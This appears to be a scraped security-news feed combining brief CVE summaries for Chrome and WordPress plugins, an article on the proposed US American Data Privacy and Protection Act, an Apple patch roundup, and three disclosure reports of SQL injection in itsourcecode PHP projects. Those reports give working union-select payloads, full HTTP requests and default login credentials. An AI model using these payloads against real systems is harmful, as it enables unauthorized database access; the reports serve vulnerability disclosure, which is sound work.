Use after free in ANGLE in Google Chrome prior to 99.0.4844.74 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2022-0975

Use after free in Browser UI in Google Chrome on Chrome OS prior to 99.0.4844.74 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page.

CVE-2022-0977

Chrome has an issue where raw_ptr broke implicit scoped_refptr for receivers in base::Bind.

Chrome Scope Break

Unauthenticated WordPress Options Change vulnerability in Biplob Adhikari's Accordions plugin <= 2.0.2 at WordPress.

CVE-2022-33198: Accordions – Multiple Accordions or FAQs Builder

Cross-Site Request Forgery (CSRF) vulnerability in JoomUnited WP Meta SEO plugin <= 4.4.8 at WordPress allows an attacker to update the social settings.

CVE-2022-30337: WP Meta SEO

A bill with bipartisan support might finally give the US a strong federal data protection law.

Usually, when Congress is working on major tech legislation, the inboxes of tech reporters get flooded with PR emails from politicians and nonprofits either denouncing or trumpeting the proposed statute. Not so with the American Data Privacy and Protection Act. A first draft of the bill seemed to pop up out of nowhere in June. Over the next month, it went through so many changes that no one could say for sure what it was even designed to do. For such an important topic, the bill’s progress has been surprisingly under the radar.

Now comes an even bigger surprise: A new version of the ADPPA has taken shape, and privacy advocates are mostly jazzed about it. It just might have enough bipartisan support to become law—meaning that, after decades of inaction, the United States could soon have a real federal privacy statute.

Perhaps the most distinctive feature of the new bill is that it focuses on what’s known as data minimization. Generally, companies would only be allowed to collect and make use of user data if it’s necessary for one of 17 permitted purposes spelled out in the bill—things like authenticating users, preventing fraud, and completing transactions. Everything else is simply prohibited. Contrast this with the type of online privacy regime most people are familiar with, which is all based on consent: an endless stream of annoying privacy pop-ups that most people click “yes” on because it’s easier than going to the trouble of turning off cookies. That’s pretty much how the European Union’s privacy law, the GDPR, has played out.

“The reason I really like this bill is, it takes a data-minimization approach first,” says Sara Collins, senior policy council at Public Knowledge, a consumer advocacy group in DC. “The bill at the outset is like, ‘One, you don't collect any more data than you reasonably need, and, two, here’s a list of reasons you might need this data.’”

A major caveat is that the list of reasons includes targeted advertising, which is the economic driver of most commercial surveillance in the first place. So the bill falls well short of simply banning the practice, which is what many data-privacy advocates would prefer. On the other hand, it imposes much stricter limits on targeted advertising—and the data collection supporting it—than any law in the US and perhaps the world. It would completely prohibit targeting ads to minors, something Joe Biden called for in his 2022 State of the Union address. It would ban targeting ads based on “sensitive data.” That category includes things like health information, precise geolocation, and private communications—as well as “information identifying an individual’s online activities over time and across third-party websites or online services.” In other words, companies would no longer be allowed to follow you around the internet, gathering data on everything you do and using it to sell you stuff.

“I think it’s a pretty fundamental shift,” says Alan Butler, executive director and president of the Electronic Privacy Information Center. “It gets at the heart of what I see as the major privacy problem in the way that ad tech has developed over the last 20 years, largely because there was no privacy law in effect. What’s developed is an ad tech industry that just gorges on personal information in every possible way it can, grabbing every possible piece of data they can find about people.”

Under the new version of the ADPPA, Butler says, some forms of targeting would remain common, particularly targeting based on first-party data. If you shop for shoes on Target.com, Target could still use that information to show you ads for shoes when you’re on another site. What it wouldn’t be able to do is match your shopping history with everything else you do on the web and on your phone to show you ads for stuff you’ve never told them you wanted. Nor could Facebook and Google continue to spy on you by placing trackers on nearly every website or free app you use, in order to build a profile of you for advertisers.

“If they’re tracking your activity across third-party websites, which they certainly are, then that’s sensitive data, and they can’t be processing that for targeted advertising purpose,” says Butler.

To the extent that the new bill would still allow targeted advertising, it would require companies to give users the right to opt out—while prohibiting the sorts of tricks that companies often use to nudge users to click “Accept all cookies” under the GDPR. And it would direct the Federal Trade Commission to create a standard for a universal opt-out that companies would have to honor, meaning users could decline all targeted advertising in one click. (That’s an important feature of California’s recently adopted privacy law.)

The ad industry seems to agree that the bill would mark a fundamental shift. Yesterday, the Association of National Advertisers, a trade group, issued a statement opposing the bill on the grounds that it would “prohibit companies from collecting and using basic demographic and online activity data for typical and responsible advertising purposes.”

Apart from its data-minimization approach, the new bill contains quite a lot of provisions that data privacy experts have long called for, including transparency standards, anti-discrimination rules, increased oversight for data brokers, and new cybersecurity requirements.

Federal privacy legislation has been something of a white whale in DC over the last few years. Since 2019, a bipartisan agreement has supposedly been just around the corner. The effort kept stalling because Democrats and Republicans were divided on two key issues: whether a federal bill should preempt state privacy laws, and whether it should create a “private right of action” allowing individuals, not just the government, to sue companies for violations. Democrats are generally against preemption and in favor of a private right of action, Republicans the reverse.

The new bill represents a long-sought compromise on those issues. It preempts state laws, but with some exceptions. (Most notably, it empowers California’s brand-new privacy agency to enforce the ADPPA within the state.) And it contains a limited private right of action, with restrictions on the damages that people can sue for.

The bill has other shortcomings, inevitably. The universal opt-out requirement is nice, but it won’t mean much until the largest browsers, especially Chrome and Safari, add the feature. The bill gives the FTC new authority to issue rules and enforce them, but it doesn’t direct any new resources to the agency, which already lacks the staff and funding to handle everything on its plate.

As a result, not everyone in the privacy camp is on board. On Tuesday, a group of mostly blue-state state attorneys general sent a letter to the committee objecting to the preemption provision. And the Electronic Frontier Foundation tweeted on Wednesday that it is “disappointed” by the compromises in the bill.

On the whole, however, the ADPPA seems wildly popular both on the Hill and among advocacy organizations. It has the support of leading privacy and civil rights nonprofits, and the House Commerce Committee voted to advance it by a 53-2 margin—an overwhelmingly bipartisan consensus that bodes well for the bill’s prospects when the full House votes on it. During yesterday’s markup hearing, several members noted that while the bill isn’t perfect, it’s simply politically impossible to pass a federal privacy law that doesn’t involve compromise on those two key issues.

Even the tech industry hasn’t launched any public campaign to kill the bill. You could take this as a sign that it’s actually too weak to trouble the industry. But Adam Kovacevich, the CEO of Chamber of Progress, a Big Tech lobbying group, points out that even the bill’s liberal critics have acknowledged that it goes further than any of the state laws it would preempt—even California’s. “I don’t think anyone in industry is crazy about the idea of the private right of action, the idea of more lawsuits,” he says. But, he adds, tech companies have already spent years learning to comply with the growing web of privacy regimes around the world. A somewhat stricter law might not be so bad if it provides a clear, fixed national standard.

None of this means that the ADPPA is sure to become law, of course. In the Senate, Maria Cantwell, the top Democrat on the Commerce Committee, has not gotten behind the effort yet, though her Republican counterpart has. And time is running out for that sclerotic body to pass any major laws before next year, when Democrats will almost surely lose their governing trifecta.

Still, privacy advocates are cautiously optimistic. “You’re looking at a situation where you have bicameral, bipartisan support, with Republicans and Democrats on board on the House and Senate side,” says Butler. “I don’t think we’ve ever been this close.”

Congress Might Pass an Actually Good Privacy Bill

Apple on Wednesday rolled out software fixes for iOS, iPadOS, macOS, tvOS, and watchOS to address a number of security flaws affecting its platforms.
This includes at least 37 flaws spanning different components in iOS and macOS that range from privilege escalation to arbitrary code execution and from information disclosure to denial-of-service (DoS).

Chief among them is

Apple on Wednesday rolled out software fixes for iOS, iPadOS, macOS, tvOS, and watchOS to address a number of security flaws affecting its platforms.

This includes at least 37 flaws spanning different components in iOS and macOS that range from privilege escalation to arbitrary code execution and from information disclosure to denial-of-service (DoS).

Chief among them is CVE-2022-2294, a memory corruption flaw in the WebRTC component that Google disclosed earlier this month as having been exploited in real-world attacks aimed at users of the Chrome browser. There is, however, no evidence of in-the-wild zero-day exploitation of the flaw targeting iOS, macOS, and Safari.

Besides CVE-2022-2294, the updates also address several arbitrary code execution flaws impacting Apple Neural Engine (CVE-2022-32810, CVE-2022-32829, and CVE-2022-32840), Audio (CVE-2022-32820), GPU Drivers (CVE-2022-32821), ImageIO (CVE-2022-32802), IOMobileFrameBuffer (CVE-2022-26768), Kernel (CVE-2022-32813 and CVE-2022-32815), and WebKit (CVE-2022-32792).

Also patched is a Pointer Authentication bypass affecting the Kernel (CVE-2022-32844), a DoS bug in the ImageIO component (CVE-2022-32785), and two privilege escalation flaws in AppleMobileFileIntegrity and File System Events (CVE-2022-32819 and CVE-2022-32826).

What's more, the latest version of macOS resolves five security vulnerabilities in the SMB module that could be potentially exploited by a malicious app to gain elevated privileges, leak sensitive information, and execute arbitrary code with kernel privileges.

Users of Apple devices are recommended to update to iOS 15.6, iPadOS 15.6, macOS (Monterey 12.5, Big Sur 11.6.8, and 2022-005 Catalina), tvOS 15.6, and watchOS 8.7 to obtain the latest security protections.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Security Patches for all Devices Fixing Dozens of New Vulnerabilities

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.

Permalink

**Hospital Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：admin

​ password：123456789

**vendors:** https://itsourcecode.com/free-projects/php-project/hospital-management-system-in-php-with-source-code/

**Vulnerability url:** /HMS/admin.php?editid=

**Vulnerability location:** /HMS/admin.php

When the Edit button is clicked, a request is sent to query admin information based on editid

**\[+\] Payload:** /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23

​ Leak place : editid

**Current database name:** hms

**Request package**：select admin information by editid

    GET /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23 HTTP/1.1
    Host: 10.12.171.4
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.12.171.4/HMS/viewadmin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=t9h6rke4unvvsje2tvam91601p; _ga=GA1.1.1903248581.1656124410; _gid=GA1.1.2042416137.1656124410; _gat=1
    Connection: close
    

**SQL injection result**：database name is displayed.

CVE-2022-34590: bug_report/sql_injection.md at master · Renrao/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via the grade parameter at /school/view/student_grade_wise.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：suarez081119@gmail.com

​ password：12345

**vendors:** https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

**Vulnerability url:** /school/view/student\_grade\_wise.php?grade=

**Vulnerability location:** /school/view/student\_grade\_wise.php

**\[+\] Payload:** /school/view/student\_grade\_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23

​ Leak place : grade

**Current database name:** std\_db, length is 6

**Request package**：select all students whose grade is specified

    GET /school/view/student_grade_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23 HTTP/1.1
    Host: 10.12.171.4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: */*
    Referer: http://10.12.171.4/school/view/all_student.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=cp26rmntdlbhle8qiofns95sv7
    Connection: close
    

**SQL injection result**：line 6 database name is displayed.

CVE-2022-34586: bug_report/sql_injection.md at master · Renrao/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via the grade parameter at /school/view/timetable_insert_form.php.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：suarez081119@gmail.com

​ password：12345

**vendors:** https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

**Vulnerability url:** /school/view/timetable\_insert\_form.php?grade=

**Vulnerability location:** /school/view/timetable\_insert\_form.php

**\[+\] Payload:** /school/view/timetable\_insert\_form.php?grade=11%20union%20select%201%2cdatabase()%23

​ Leak place : grade

**Current database name:** std\_db, length is 6

**Request package**：

    GET /school/view/timetable_insert_form.php?grade=11%20union%20select%201%2cdatabase()%23 HTTP/1.1
    Host: 10.12.171.4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: */*
    Referer: http://10.12.171.4/school/view/timetable.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=cp26rmntdlbhle8qiofns95sv7
    Connection: close
    

**SQL injection result**：line 52 database name is displayed.

Tag

#chrome